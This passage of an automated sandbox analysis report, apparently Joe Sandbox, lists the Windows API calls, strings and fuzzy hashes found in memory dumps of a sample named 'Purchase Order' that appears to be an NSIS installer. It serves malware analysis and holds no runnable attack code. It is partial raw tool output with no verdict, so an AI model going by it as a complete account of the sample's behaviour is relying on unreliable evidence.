                                                                                                  • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                  • Instruction Fuzzy Hash: DB21A4B5804704ABCB219F78DD08B5BBBF8AF41714F048629E995E62E0C734E944CB55
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                                                                                  • lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                                                                                  • lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
                                                                                                  • SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 2531174081-0
                                                                                                  • Opcode ID: 5079ce61eb60a58f18aa72498b661a7186dcc34ecfe9b72952c752fd8c1df286
                                                                                                  • Instruction ID: 38fa31381a166635c2069e030e34d3db0945d62c2eda65f80c6bd2e149c96a35
                                                                                                  • Opcode Fuzzy Hash: 5079ce61eb60a58f18aa72498b661a7186dcc34ecfe9b72952c752fd8c1df286
                                                                                                  • Instruction Fuzzy Hash: FD215C71E00518BBDF119FA5CD80ADFBFB9EB04354F14807AF904AA291C7799A41CFA8
                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(?,00000000), ref: 00402CC3
                                                                                                  • GetTickCount.KERNEL32 ref: 00402CE1
                                                                                                  • wsprintfA.USER32 ref: 00402D0F
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                                                                                    • Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
                                                                                                    • Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402D33
                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402D41
                                                                                                    • Part of subcall function 00402C8F: MulDiv.KERNEL32(?,00000064,?), ref: 00402CA4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                  • String ID: ... %d%%
                                                                                                  • API String ID: 722711167-2449383134
                                                                                                  • Opcode ID: 1e33dda50caea38695290f70d86be4c9e72cbf0e3d215f61cbcfcdcf3d334b50
                                                                                                  • Instruction ID: 547fa0e596d0efa3134ade0ba199646732fee1a7f54f1ab5f8be41358a9578df
                                                                                                  • Opcode Fuzzy Hash: 1e33dda50caea38695290f70d86be4c9e72cbf0e3d215f61cbcfcdcf3d334b50
                                                                                                  • Instruction Fuzzy Hash: DC019BB0906614E7EB21BB64EF0DEDE766CEB04701B444037F405B11E5C7B89941D79E
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049F6
                                                                                                  • GetMessagePos.USER32 ref: 004049FE
                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404A18
                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A2A
                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                  • String ID: f
                                                                                                  • API String ID: 41195575-1993550816
                                                                                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                  • Instruction ID: 2232a7e87341d92c9ad346ae082ec06308d60ff2d87fc7f715a57a5a5eae5b25
                                                                                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                  • Instruction Fuzzy Hash: E5018071E40219BADB00DB94CC41BFEBBB8AB45711F10412BBA10B61C0D7B465018BA5
                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 00405619
                                                                                                  • GetLastError.KERNEL32 ref: 0040562D
                                                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405642
                                                                                                  • GetLastError.KERNEL32 ref: 0040564C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                  • String ID: ds@$ts@
                                                                                                  • API String ID: 3449924974-968229870
                                                                                                  • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                                  • Instruction ID: f6395dc840433d181f75b3fc8fae80690a43e09e82cbb082af9cf45b84ce1534
                                                                                                  • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                                  • Instruction Fuzzy Hash: 82010871D04259EAEF119FA0DC44BEFBFB8EB14314F008576D908B6280D779A604CFAA
                                                                                                  APIs
                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                                                                                  • wsprintfA.USER32 ref: 00402C62
                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402C72
                                                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                  • Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                                  • Instruction ID: e0e458c2d16b5d3c5a169a1492fe07981551179f6e5c56f92d0567975436b572
                                                                                                  • Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                                  • Instruction Fuzzy Hash: 35F0317090420DABEF205F60CD0AFAE3769EB04345F00C43AFA16B51D0D7B99A55CB59
                                                                                                  APIs
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
                                                                                                  • wsprintfA.USER32 ref: 00406272
                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00406286
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                  • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                                  • Instruction ID: 4eb1d724573375327ef03b870ab6fb06d37159ba94d5fa14c1e1425601a81350
                                                                                                  • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                                  • Instruction Fuzzy Hash: A2F0FC3090011AA7DB24B768DC0DFEB365CAB08305F1401BAA546E11D1D578F9258B69
                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                                                                  • GlobalFree.KERNEL32(?), ref: 004027F2
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2667972263-0
                                                                                                  • Opcode ID: 127938ffedbdb685085fdf40d0208ae81fb03e7592c7cd39d7ae25b5127f120c
                                                                                                  • Instruction ID: 589acf511f7bba285ed25554ef0f071862dbcd9cf46fffc414e4c77000f41e55
                                                                                                  • Opcode Fuzzy Hash: 127938ffedbdb685085fdf40d0208ae81fb03e7592c7cd39d7ae25b5127f120c
                                                                                                  • Instruction Fuzzy Hash: 5E219A71C04128BBCF216FA5CE89DAE7A79AF09324F14423AF520762E1C6795D40DBA9
                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061BA
                                                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 004061C7
                                                                                                  • CharNextA.USER32(?,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061CC
                                                                                                  • CharPrevA.USER32(?,?,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061DC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Char$Next$Prev
                                                                                                  • String ID: *?|<>/":
                                                                                                  • API String ID: 589700163-165019052
                                                                                                  • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                                  • Instruction ID: 28f88d73301ddfe76a8902f897fcc58808f561dcfc6ac49559e28e986a88295b
                                                                                                  • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                                  • Instruction Fuzzy Hash: AF11C8718083912DFB3216644C44B777F998F9A760F19007BE9D6762C3C67C5C53826D
                                                                                                  APIs
                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 00401798
                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,00409400,00409400,00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 004017C2
                                                                                                    • Part of subcall function 00405EF7: lstrcpynA.KERNEL32(?,?,00000400,0040336D,00422F20,NSIS Error), ref: 00405F04
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                                                                                    • Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
                                                                                                    • Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1941528284-0
                                                                                                  • Opcode ID: 385cb254830b3dbcb0c35d99c8dbf43eaeb3157a66b4005c67f4322c39a81f81
                                                                                                  • Instruction ID: 1ba5c428860e61568eef0a4ccac71dac967fbf7ecb8295bcfefdc03a30224d69
                                                                                                  • Opcode Fuzzy Hash: 385cb254830b3dbcb0c35d99c8dbf43eaeb3157a66b4005c67f4322c39a81f81
                                                                                                  • Instruction Fuzzy Hash: 2341F471A04515BACF107BB5DC45EAF3678EF41328B20823BF021B11E2DA3C8A419FAD
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402B2F
                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1912718029-0
                                                                                                  • Opcode ID: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                                  • Instruction ID: cbb66f3b7e8ae2888f759c75a40f8dd5de3b5766fb854263a8955dc236021e84
                                                                                                  • Opcode Fuzzy Hash: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                                  • Instruction Fuzzy Hash: 39117C71A00108FFDF11AF90DE89DAA3B7DEB54345F004076FA05F10A0D378AE51AB69
                                                                                                  APIs
                                                                                                  • GetDC.USER32(?), ref: 00401D98
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                  • CreateFontIndirectA.GDI32(0040A808), ref: 00401E1A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3808545654-0
                                                                                                  • Opcode ID: 384e23ba8be56f1d8b58cd2f78efa8b6131d55f969df9b920b0b3fd3205056ac
                                                                                                  • Instruction ID: 31dc6bfce766dd2e9c365b6b9c1ce0fa0646d0edadaed3ffd0317ad467dc8ee1
                                                                                                  • Opcode Fuzzy Hash: 384e23ba8be56f1d8b58cd2f78efa8b6131d55f969df9b920b0b3fd3205056ac
                                                                                                  • Instruction Fuzzy Hash: 1E017572948340AFE7006B74AE4EB993FF4DB95315F10847AF201B62E2C6B905528F6E
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?), ref: 00401D3F
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1849352358-0
                                                                                                  • Opcode ID: bd1a246c87c7f6178c6ecc63fdf164811e3027df84ebbbc61871bc77a69c7b8e
                                                                                                  • Instruction ID: 3a73a5ecaa8fddf8dab02391599d10e6f088d4e67d6af50185a53a7dc2f76cba
                                                                                                  • Opcode Fuzzy Hash: bd1a246c87c7f6178c6ecc63fdf164811e3027df84ebbbc61871bc77a69c7b8e
                                                                                                  • Instruction Fuzzy Hash: D6F0FFB2A04119BFDB11EBA4DE88DAFBBBCEB44301B104476F601F2191C6749D018B79
                                                                                                  APIs
                                                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Timeout
                                                                                                  • String ID: !
                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                  • Opcode ID: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
                                                                                                  • Instruction ID: 023f80fe09a274ffd38664002148efa248b1b49841e283c842910b226ff12a9e
                                                                                                  • Opcode Fuzzy Hash: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
                                                                                                  • Instruction Fuzzy Hash: BA219171A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA7886408B28
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
                                                                                                  • wsprintfA.USER32 ref: 00404977
                                                                                                  • SetDlgItemTextA.USER32(?,0041FD30), ref: 0040498A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                  • String ID: %u.%u%s%s
                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                  • Opcode ID: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
                                                                                                  • Instruction ID: 7f1be1aa0c85ccb86495671cb382a06f82cddcf8175a130fa0267404931b34df
                                                                                                  • Opcode Fuzzy Hash: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
                                                                                                  • Instruction Fuzzy Hash: CF11B7736041283BDB0065799D45EAF3298DB85374F250637FA25F21D1E978CC1255EC
                                                                                                  APIs
                                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
                                                                                                  • lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
                                                                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1356686001-0
